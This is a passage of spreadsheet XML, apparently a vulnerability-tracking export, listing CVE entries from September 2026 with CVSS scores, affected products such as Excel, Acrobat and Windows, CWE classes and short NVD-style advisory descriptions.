      <c r="K962" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L962" s="5" t="inlineStr"/>
      <c r="M962" s="5" t="inlineStr"/>
      <c r="N962" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O962" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P962" s="5" t="inlineStr"/>
      <c r="Q962" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R962" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S962" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79909</t>
        </is>
      </c>
    </row>
    <row r="963">
      <c r="A963" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B963" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C963" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80075</t>
        </is>
      </c>
      <c r="D963" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E963" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F963" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G963" s="5" t="inlineStr"/>
      <c r="H963" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I963" s="5" t="inlineStr"/>
      <c r="J963" s="5" t="inlineStr"/>
      <c r="K963" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="L963" s="5" t="inlineStr"/>
      <c r="M963" s="5" t="inlineStr"/>
      <c r="N963" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O963" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P963" s="5" t="inlineStr"/>
      <c r="Q963" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R963" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Work Folders allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S963" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80075</t>
        </is>
      </c>
    </row>
    <row r="964">
      <c r="A964" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B964" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C964" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80112</t>
        </is>
      </c>
      <c r="D964" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E964" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F964" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G964" s="5" t="inlineStr"/>
      <c r="H964" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I964" s="5" t="inlineStr"/>
      <c r="J964" s="5" t="inlineStr"/>
      <c r="K964" s="5" t="inlineStr"/>
      <c r="L964" s="5" t="inlineStr"/>
      <c r="M964" s="5" t="inlineStr"/>
      <c r="N964" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O964" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P964" s="5" t="inlineStr"/>
      <c r="Q964" s="5" t="inlineStr">
        <is>
          <t>CWE-732</t>
        </is>
      </c>
      <c r="R964" s="5" t="inlineStr">
        <is>
          <t>PassMark PerformanceTest before 11.1 build 1012, BurnInTest before 11.1 build 1000, and OSForensics before 11.1 build 1016 contain an improper access control vulnerability in the DirectIo64.sys kernel driver that allows unprivileged local users to perform privileged hardware operations by opening a handle to the device object created without a security descriptor. Attackers can issue IOCTLs through the permissive default Windows ACL applied to the device to access restricted hardware operations regardless of privilege or integrity level.</t>
        </is>
      </c>
      <c r="S964" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80112</t>
        </is>
      </c>
    </row>
    <row r="965">
      <c r="A965" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B965" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C965" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80161</t>
        </is>
      </c>
      <c r="D965" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E965" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F965" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G965" s="5" t="inlineStr"/>
      <c r="H965" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I965" s="5" t="inlineStr"/>
      <c r="J965" s="5" t="inlineStr"/>
      <c r="K965" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L965" s="5" t="inlineStr"/>
      <c r="M965" s="5" t="inlineStr"/>
      <c r="N965" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O965" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P965" s="5" t="inlineStr"/>
      <c r="Q965" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R965"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S965" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80161</t>
        </is>
      </c>
    </row>
    <row r="966">
      <c r="A966" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B966" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C966" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81353</t>
        </is>
      </c>
      <c r="D966" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E966" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F966" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G966" s="5" t="inlineStr"/>
      <c r="H966" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I966" s="5" t="inlineStr"/>
      <c r="J966" s="5" t="inlineStr"/>
      <c r="K966" s="5" t="inlineStr"/>
      <c r="L966" s="5" t="inlineStr"/>
      <c r="M966" s="5" t="inlineStr"/>
      <c r="N966" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O966" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P966" s="5" t="inlineStr"/>
      <c r="Q966" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R966" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S966" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81353</t>
        </is>
      </c>
    </row>
    <row r="967">
      <c r="A967" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B967" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C967" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81386</t>
        </is>
      </c>
      <c r="D967" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E967" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F967" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G967" s="5" t="inlineStr"/>
      <c r="H967" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I967" s="5" t="inlineStr"/>
      <c r="J967" s="5" t="inlineStr"/>
      <c r="K967" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L967" s="5" t="inlineStr"/>
      <c r="M967" s="5" t="inlineStr"/>
      <c r="N967" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O967" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P967" s="5" t="inlineStr"/>
      <c r="Q967" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R967" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S967" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81386</t>
        </is>
      </c>
    </row>
    <row r="968">
      <c r="A968" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B968" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C968" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81388</t>
        </is>
      </c>
      <c r="D968" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E968" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F968" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G968" s="5" t="inlineStr"/>
      <c r="H968" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I968" s="5" t="inlineStr"/>
      <c r="J968" s="5" t="inlineStr"/>
      <c r="K968" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L968" s="5" t="inlineStr"/>
      <c r="M968" s="5" t="inlineStr"/>
      <c r="N968" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O968" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P968" s="5" t="inlineStr"/>
      <c r="Q968" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R968" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S968" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81388</t>
        </is>
      </c>
    </row>
    <row r="969">
      <c r="A969" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B969" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C969" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81396</t>
        </is>
      </c>
      <c r="D969" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E969" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F969" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G969" s="5" t="inlineStr"/>
      <c r="H969" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I969" s="5" t="inlineStr"/>
      <c r="J969" s="5" t="inlineStr"/>
      <c r="K969" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L969" s="5" t="inlineStr"/>
      <c r="M969" s="5" t="inlineStr"/>
      <c r="N969" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O969" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P969" s="5" t="inlineStr"/>
      <c r="Q969" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-193</t>
        </is>
      </c>
      <c r="R969" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S969" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81396</t>
        </is>
      </c>
    </row>
    <row r="970">
      <c r="A970" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B970" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C970" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81397</t>
        </is>
      </c>
      <c r="D970" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E970" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F970" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G970" s="5" t="inlineStr"/>
      <c r="H970" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I970" s="5" t="inlineStr"/>
      <c r="J970" s="5" t="inlineStr"/>
      <c r="K970" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L970" s="5" t="inlineStr"/>
      <c r="M970" s="5" t="inlineStr"/>
      <c r="N970" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O970" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P970" s="5" t="inlineStr"/>
      <c r="Q970" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R970" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S970" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81397</t>
        </is>
      </c>
    </row>
    <row r="971">
      <c r="A971" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B971" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C971" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81398</t>
        </is>
      </c>
      <c r="D971" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E971" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F971" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G971" s="5" t="inlineStr"/>
      <c r="H971" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I971" s="5" t="inlineStr"/>
      <c r="J971" s="5" t="inlineStr"/>
      <c r="K971" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L971" s="5" t="inlineStr"/>
      <c r="M971" s="5" t="inlineStr"/>
      <c r="N971" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O971" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P971" s="5" t="inlineStr"/>
      <c r="Q971" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R971" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S971" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81398</t>
        </is>
      </c>
    </row>
    <row r="972">
      <c r="A972" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B972" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C972" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81947</t>
        </is>
      </c>
      <c r="D972" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E972" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F972" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G972" s="5" t="inlineStr"/>
      <c r="H972" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I972" s="5" t="inlineStr"/>
      <c r="J972" s="5" t="inlineStr"/>
      <c r="K972" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t>
        </is>
      </c>
      <c r="L972" s="5" t="inlineStr"/>
      <c r="M972" s="5" t="inlineStr"/>
      <c r="N972" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O972" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P972" s="5" t="inlineStr"/>
      <c r="Q972" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R972" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S972" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81947</t>
        </is>
      </c>
    </row>
    <row r="973">
      <c r="A973" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B973" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C973" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81948</t>
        </is>
      </c>
      <c r="D973" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E973" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F973" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G973" s="5" t="inlineStr"/>
      <c r="H973" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I973" s="5" t="inlineStr"/>
      <c r="J973" s="5" t="inlineStr"/>
      <c r="K973" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L973" s="5" t="inlineStr"/>
      <c r="M973" s="5" t="inlineStr"/>
      <c r="N973" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O973" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P973" s="5" t="inlineStr"/>
      <c r="Q973" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R973" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S973" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81948</t>
        </is>
      </c>
    </row>
    <row r="974">
      <c r="A974" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B974" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C974" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81949</t>
        </is>
      </c>
      <c r="D974" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E974" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F974" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G974" s="5" t="inlineStr"/>
      <c r="H974" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I974" s="5" t="inlineStr"/>
      <c r="J974" s="5" t="inlineStr"/>
      <c r="K974" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L974" s="5" t="inlineStr"/>
      <c r="M974" s="5" t="inlineStr"/>
      <c r="N974" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O974" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P974" s="5" t="inlineStr"/>
      <c r="Q974" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R974" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S974" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81949</t>
        </is>
      </c>
    </row>
    <row r="975">
      <c r="A975" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B975" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C975" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81950</t>
        </is>
      </c>
      <c r="D975" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E975" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F975" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G975" s="5" t="inlineStr"/>
      <c r="H975" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I975" s="5" t="inlineStr"/>
      <c r="J975" s="5" t="inlineStr"/>
      <c r="K975" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L975" s="5" t="inlineStr"/>
      <c r="M975" s="5" t="inlineStr"/>
      <c r="N975" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O975" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P975" s="5" t="inlineStr"/>
      <c r="Q975" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R975" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S975" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81950</t>
        </is>
      </c>
    </row>
    <row r="976">
      <c r="A976" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B976" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C976" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81951</t>
        </is>
      </c>
      <c r="D976" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E976" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F976" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G976" s="5" t="inlineStr"/>
      <c r="H976" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I976" s="5" t="inlineStr"/>
      <c r="J976" s="5" t="inlineStr"/>
      <c r="K976" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L976" s="5" t="inlineStr"/>
      <c r="M976" s="5" t="inlineStr"/>
      <c r="N976" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O976" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P976" s="5" t="inlineStr"/>
      <c r="Q976" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R976" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S976" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81951</t>
        </is>
      </c>
    </row>
    <row r="977">
      <c r="A977" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B977" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C977" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81953</t>
        </is>
      </c>
      <c r="D977" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E977" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F977" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G977" s="5" t="inlineStr"/>
      <c r="H977" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I977" s="5" t="inlineStr"/>
      <c r="J977" s="5" t="inlineStr"/>
      <c r="K977" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L977" s="5" t="inlineStr"/>
      <c r="M977" s="5" t="inlineStr"/>
      <c r="N977" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O977" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P977" s="5" t="inlineStr"/>
      <c r="Q977" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R977" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S977" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81953</t>
        </is>
      </c>
    </row>
    <row r="978">
      <c r="A978" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B978" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C978" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81954</t>
        </is>
      </c>
      <c r="D978" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E978" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F978" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G978" s="5" t="inlineStr"/>
      <c r="H978" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I978" s="5" t="inlineStr"/>
      <c r="J978" s="5" t="inlineStr"/>
      <c r="K978" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L978" s="5" t="inlineStr"/>
      <c r="M978" s="5" t="inlineStr"/>
      <c r="N978" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O978" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P978" s="5" t="inlineStr"/>
      <c r="Q978" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R978" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S978" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81954</t>
        </is>
      </c>
    </row>
    <row r="979">
      <c r="A979" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B979" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C979" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81956</t>
        </is>
      </c>
      <c r="D979" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E979" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F979" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G979" s="5" t="inlineStr"/>
      <c r="H979" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I979" s="5" t="inlineStr"/>
      <c r="J979" s="5" t="inlineStr"/>
      <c r="K979" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t>
